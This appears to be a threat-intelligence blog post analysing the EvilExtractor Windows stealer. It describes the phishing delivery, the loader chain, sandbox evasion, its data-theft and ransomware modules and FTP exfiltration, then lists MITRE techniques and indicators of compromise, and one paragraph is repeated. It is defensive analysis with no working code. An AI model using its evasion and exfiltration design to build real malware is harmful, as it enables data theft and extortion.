The most widely used computer operating system in this world is Microsoft Windows, which itself makes Windows the most targeted for stealing data. A new attack tool was developed by the company Kodex which targets the Windows operating system and steals data.
In this article, we will discuss the new EvilExtractor stealer and the technical analysis of the malware.
What is EvilExtractor?
EvilExtractor is a tool that targets Windows operating systems and extracts data and files from endpoint devices through an FTP service. It was developed by Kodex, who claims it is an educational tool, but malware researchers suggest that cybercriminals are using it as an information stealer. The tool includes multiple modules that can be used for extracting data.
By March 2023, there was a huge spike in communication with the host, evilextractor[.]com. EvilExtractor camouflages itself as a genuine file like Adobe PDF or Dropbox, but then it initiates PowerShell malicious activities and has Anti-VM functions. Its primary aim is to extract browser data and other information from compromised endpoints and upload it to the attacker’s FTP server.
EvilExtractor for sales in the dark web (credits: Fortinet)
By March 2023, there was a huge spike in communication with the host, evilextractor[.]com. EvilExtractor camouflages itself as a genuine file like Adobe PDF or Dropbox, but then it initiates PowerShell malicious activities and has Anti-VM functions. Its primary aim is to extract browser data and other information from compromised endpoints and upload it to the attacker’s FTP server.
Technical Analysis -EvilExtractor
The initial analysis happens via a phishing mail requesting an account confirmation request containing a malicious attachment that disguises itself as a legitimate decompressed file icon for Adobe PDF.
The malicious file is actually a Python executable program. When the recipient opens the file, a PyInstaller file runs and initiates a .NET loader that utilizes a PowerShell script encoded in base64 to start an EvilExtractor executable.
During its initial execution, the malware will verify the system’s hostname and time to identify whether it is operating in a virtual environment or a sandbox for analysis purposes. If detected, it will terminate its operation.
The primary code of EvilExtractor is obtained by decrypting the py file. The malware consists of 7 attack modules that operate over FTP services:
- password and cookie extractor
- screen and webcam extractor
- credential extractor
- keylogger
- desktop extractor
- all-in-one extractor (bundles previous extractor options)
- Kodex ransomware.
The program initially verifies if the current date falls between 2022-11-09 and 2023-04-12. If it doesn’t, the program erases the data in PSReadline and terminates. Additionally, the program checks if the product model matches any of the listed virtual machine names, such as VirtualBox, VMWare, Hyper-V, etc. The program also compares the victim’s hostname with a list of 187 machine names from VirusTotal and other scanner/virtual machines.
EvilExtractor doing device check (credits: Fortinet)
If the environment check is completed successfully, EvilExtractor will download 3 different components from http://193[.]42[.]33[.]232. All the downloaded components are Obfuscated using PyArmor. The files are
- “KK2023.zip”- A tool that collects browser data and saves it in “IMP_Data” folder, extracting cookies from popular browsers.
- “Confirm.zip” – Keylogger
- “MnMs.zip” – Webcam extractor
EvilExtractor fetches files with extensions like jpg, png, mp4, mp3, pdf, etc., from Desktop and Download directories. It also takes screenshots using “CopyFromScreen” command.
Kodex Ransomware
After being executed, Kodex initiates the compression of the victim’s files with the help of 7-zip. It saves a list of compressed file names to Encrypted_files.txt, and then adds the compressed files to a password-protected archive, which is dropped on the victim’s desktop.
The attacker’s ransom note appears in HTML format on the victim’s browser, along with a countdown timer of 24 hours, demanding a ransom payment to the attacker’s Bitcoin wallet address for a decryption key. A screenshot of the victim’s desktop displaying the ransom note is captured and transmitted, along with Encrypted_files.txt, to the attacker’s EvilExtractor server via FTP. The IP address of the FTP server used by the analyzed sample was 89.117.169[.]78.
Kodex Ransomware notes (credits: Fortinet)
MITRE attack Identifier
- T1105 (Ingress Tool Transfer)
- T1071.002 (File Transfer Protocols)
- T1059.001 (PowerShell)
- T1562.001 (Disable or Modify Tools)
- T1497.001 (System Checks)
IOC
IP Address:
- 45.87.81.184
- 193.42.33.232
- 89.117.169.78
Files:
- 352efd1645982b8d23a841107007c8b4b024eb6bb5d6b312e5783ce4aa62b685
- 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
- 75688c32a3c1f04df0fc02491180c8079d7fdc0babed981f5860f22f5e118a5e
- 826c7c112dd1ae80469ef81f5066003d7691a349e6234c8f8ca9637b0984fc45
- b1ef1654839b73f03b73c4ef4e20ce4ecdef2236ec6e1ca36881438bc1758dcd
- 17672795fb0c8df81ab33f5403e0e8ed15f4b2ac1e8ac9fef1fec4928387a36d
Email Address
Conclusion
The EvilExtractor is being employed as a tool for stealing various types of information while also having multiple malicious capabilities, such as ransomware. Its PowerShell script has the ability to avoid detection in a .NET loader or PyArmor. The developer of this tool has quickly updated numerous functions and improved its reliability.
I hope this article helped in understanding about what the new evil extractor stealer and the technical analysis of the malware. Please share this post and help secure the digital world. Visit our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium & Instagram, and subscribe to receive updates like this.
Frequently Asked Questions:
EvilExtractor is a tool developed by Kodex that targets Windows operating systems to extract data and files from endpoint devices. It is disguised as a legitimate file like Adobe PDF or Dropbox, initiating malicious PowerShell activities and Anti-VM functions.
EvilExtractor was developed by a company named Kodex.
The primary aim of EvilExtractor is to extract browser data and other information from compromised endpoints and upload it to the attacker’s FTP server.
EvilExtractor starts with a phishing email containing a malicious attachment disguised as a legitimate file. Once opened, it runs a Python executable program, which initiates a .NET loader using a PowerShell script to start the EvilExtractor executable. It has seven attack modules operating over FTP services, each designed for a specific type of data extraction.
EvilExtractor checks if the system is operating in a virtual environment or a sandbox by verifying the system’s hostname and time. If such an environment is detected, it terminates its operation.
Kodex ransomware is part of EvilExtractor’s attack modules. It compresses the victim’s files, saves a list of compressed file names, and adds these to a password-protected archive on the victim’s desktop. A ransom note is displayed on the victim’s browser, demanding a payment to the attacker’s Bitcoin wallet address for a decryption key.
The blog post does not mention specific measures against EvilExtractor. However, generally, it is crucial to maintain up-to-date antivirus software, be wary of suspicious emails and attachments, regularly back up important data, and stay informed about the latest cybersecurity threats.
Yes, EvilExtractor has been seen for sale on the dark web.
As per the blog post, EvilExtractor specifically targets the Windows operating system.
